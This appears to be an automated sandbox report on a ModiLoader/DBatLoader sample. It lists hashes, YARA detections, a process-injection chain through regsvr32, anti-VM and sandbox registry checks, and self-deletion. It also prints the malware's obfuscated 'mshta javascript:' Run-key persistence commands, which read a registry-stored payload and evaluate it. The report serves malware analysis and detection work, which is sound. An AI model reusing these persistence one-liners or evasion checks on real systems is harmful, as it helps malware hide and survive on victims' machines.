Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-11-2024 16:32
Static task
static1
Behavioral task
behavioral1
Sample
866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe
-
Size
466KB
-
MD5
866d9101428e38c3dc57db4968dfaa13
-
SHA1
005b5a44e077f343f072bc1aa5701df706268925
-
SHA256
df1538c5a03de24bfa378d1c9eb16d8de640828eadc7c06328bef1d47e06a623
-
SHA512
e5c55fa47360165d129740c31cec765552eda48a0d3c87dda26a952c55caf50f11fa829a4441c1aa3b381011b6e37b6ae873220c307c259008295f6c304f0e07
-
SSDEEP
12288:qhVx7mlhyZhowU+HXn30CLD6b0wWCQPLBAKq:qhbmEowU+3n30pbVQP1Rq
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
ModiLoader Second Stage 38 IoCs
Processes:
resource yara_rule behavioral2/memory/4740-7-0x0000000000400000-0x0000000000479000-memory.dmp modiloader_stage2 behavioral2/memory/4740-9-0x0000000002570000-0x0000000002634000-memory.dmp modiloader_stage2 behavioral2/memory/4740-11-0x0000000002570000-0x0000000002634000-memory.dmp modiloader_stage2 behavioral2/memory/4740-13-0x0000000002570000-0x0000000002634000-memory.dmp modiloader_stage2 behavioral2/memory/4740-12-0x0000000002570000-0x0000000002634000-memory.dmp modiloader_stage2 behavioral2/memory/4740-10-0x0000000002570000-0x0000000002634000-memory.dmp modiloader_stage2 behavioral2/memory/4740-15-0x0000000002570000-0x0000000002634000-memory.dmp modiloader_stage2 behavioral2/memory/4740-21-0x0000000000400000-0x0000000000479000-memory.dmp modiloader_stage2 behavioral2/memory/3824-28-0x0000000000340000-0x0000000000404000-memory.dmp modiloader_stage2 behavioral2/memory/3824-29-0x0000000000340000-0x0000000000404000-memory.dmp modiloader_stage2 behavioral2/memory/3824-27-0x0000000000340000-0x0000000000404000-memory.dmp modiloader_stage2 behavioral2/memory/3824-26-0x0000000000340000-0x0000000000404000-memory.dmp modiloader_stage2 behavioral2/memory/3824-25-0x0000000000340000-0x0000000000404000-memory.dmp modiloader_stage2 behavioral2/memory/3824-32-0x0000000000340000-0x0000000000404000-memory.dmp modiloader_stage2 behavioral2/memory/1920-41-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/1920-45-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/1920-46-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/1920-44-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/1920-43-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/1920-42-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/1920-47-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/1920-48-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/1920-49-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/1920-50-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/2332-55-0x0000000000820000-0x00000000008E4000-memory.dmp modiloader_stage2 behavioral2/memory/2332-60-0x0000000000820000-0x00000000008E4000-memory.dmp modiloader_stage2 behavioral2/memory/2332-59-0x0000000000820000-0x00000000008E4000-memory.dmp modiloader_stage2 behavioral2/memory/2332-58-0x0000000000820000-0x00000000008E4000-memory.dmp modiloader_stage2 behavioral2/memory/2332-57-0x0000000000820000-0x00000000008E4000-memory.dmp modiloader_stage2 behavioral2/memory/2332-56-0x0000000000820000-0x00000000008E4000-memory.dmp modiloader_stage2 behavioral2/memory/1920-61-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/1920-62-0x0000000000510000-0x00000000005D4000-memory.dmp modiloader_stage2 behavioral2/memory/1232-67-0x0000000000D10000-0x0000000000DD4000-memory.dmp modiloader_stage2 behavioral2/memory/1232-71-0x0000000000D10000-0x0000000000DD4000-memory.dmp modiloader_stage2 behavioral2/memory/1232-70-0x0000000000D10000-0x0000000000DD4000-memory.dmp modiloader_stage2 behavioral2/memory/1232-69-0x0000000000D10000-0x0000000000DD4000-memory.dmp modiloader_stage2 behavioral2/memory/1232-68-0x0000000000D10000-0x0000000000DD4000-memory.dmp modiloader_stage2 behavioral2/memory/1232-72-0x0000000000D10000-0x0000000000DD4000-memory.dmp modiloader_stage2 -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
regsvr32.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:eLz6xswX0l=\"s\";ww2=new%20ActiveXObject(\"WScript.Shell\");ffzrcRQq1=\"3VWrRZ\";WI1jJ=ww2.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\c5aab87e52\\\\7af243c3\");Z5t4enAz=\"S0S74\";eval(WI1jJ);Op4aKjX0=\"Qv\";" regsvr32.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
Processes:
regsvr32.exepid Process 1920 regsvr32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
regsvr32.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:zKmS6W5E=\"lA\";gL6=new%20ActiveXObject(\"WScript.Shell\");e2DDWXDZ8=\"gy\";owM12M=gL6.RegRead(\"HKCU\\\\software\\\\c5aab87e52\\\\7af243c3\");UM4h7SBJz=\"l5F9W\";eval(owM12M);ETEC7vUx=\"N9EyBZR\";" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:NwhpRLy5=\"ALQck\";Al0=new%20ActiveXObject(\"WScript.Shell\");uurF9BXpb=\"Bj55J\";vU3vU=Al0.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\c5aab87e52\\\\7af243c3\");xjS7Df6bb=\"1\";eval(vU3vU);HUYYv7nQO8=\"fb\";" regsvr32.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 regsvr32.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
regsvr32.exeregsvr32.exeregsvr32.exeregsvr32.exe866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe -
Processes:
regsvr32.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION regsvr32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" regsvr32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\International regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
regsvr32.exepid Process 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe -
Suspicious behavior: MapViewOfSection 12 IoCs
Processes:
866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exeregsvr32.exeregsvr32.exepid Process 4740 866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe 4740 866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe 4740 866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe 3824 regsvr32.exe 3824 regsvr32.exe 3824 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe 1920 regsvr32.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exepid Process 4740 866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe 4740 866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exepid Process 4740 866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe 4740 866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exeregsvr32.exeregsvr32.exedescription pid Process procid_target PID 4740 wrote to memory of 3824 4740 866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe 87 PID 4740 wrote to memory of 3824 4740 866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe 87 PID 4740 wrote to memory of 3824 4740 866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe 87 PID 3824 wrote to memory of 1920 3824 regsvr32.exe 90 PID 3824 wrote to memory of 1920 3824 regsvr32.exe 90 PID 3824 wrote to memory of 1920 3824 regsvr32.exe 90 PID 1920 wrote to memory of 2332 1920 regsvr32.exe 93 PID 1920 wrote to memory of 2332 1920 regsvr32.exe 93 PID 1920 wrote to memory of 2332 1920 regsvr32.exe 93 PID 1920 wrote to memory of 1232 1920 regsvr32.exe 97 PID 1920 wrote to memory of 1232 1920 regsvr32.exe 97 PID 1920 wrote to memory of 1232 1920 regsvr32.exe 97
Processes
-
C:\Users\Admin\AppData\Local\Temp\866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\866d9101428e38c3dc57db4968dfaa13_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Adds policy Run key to start application
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Adds Run key to start application
- Maps connected drives based on registry
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2332
-
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1232
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2